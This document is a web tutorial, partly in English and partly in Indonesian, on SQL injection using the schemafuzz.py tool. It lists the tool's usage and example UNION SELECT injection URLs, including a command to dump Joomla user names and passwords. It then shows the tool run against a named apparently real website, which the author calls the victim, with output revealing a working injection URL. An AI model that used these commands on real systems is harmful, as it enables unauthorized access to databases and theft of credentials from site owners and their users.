How to SQL Injection
SQL Injection Tutorial by Marezzi (MySQL)
In this tutorial I will describe how sql injection works and how to use it to get some useful information.
First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential information etc…(in shortly).
1.SQL Injection (classic or error based or whatever you call it) 
2.Blind SQL Injection (the harder part)
So let’s start with some action
Schemafuzz.py
Anda bisa mendownload script Schemafuzz.py di sini dan kemudian menjalankannya dengan program Python.
Script schemafuzz.py dibuat dengan bahasa python.
Perintah-perintahnya adalah sebagai berikut:
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."
Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.
Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
nortonvietnam.com
Korban kali ini adalah nortonvietnam.com yang jika dilihat sekilas merupakan sebuah website berkebangsaan vietnam yang menjual produk Norton Antivirus.
http://nortonvietnam.com/index.php?mod=newscat&id=4
Hasil penyelidikan dengan menggunakan program schemafuzz.py adalah sebagai berikut:
./schemafuzz.py --findcol -u "nortonvietnam.com/index.php?mod=newscat&id=4"
[+] URL: http://nortonvietnam.com/index.php?mod=newscat&id=4--
[+] Evasion Used: "+" "--"
[+] 12:08:13
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,
[+] Column Length is: 15
[+] Found null column at column #: 0
[+] SQLi URL: http://nortonvietnam.com/index.php?mod=newscat&id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14--
[+] darkc0de URL: http://nortonvietnam.com/index.php?mod=newscat&id=4+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,5,6,7,8,9,10,11,12,13,14
[-] Done!
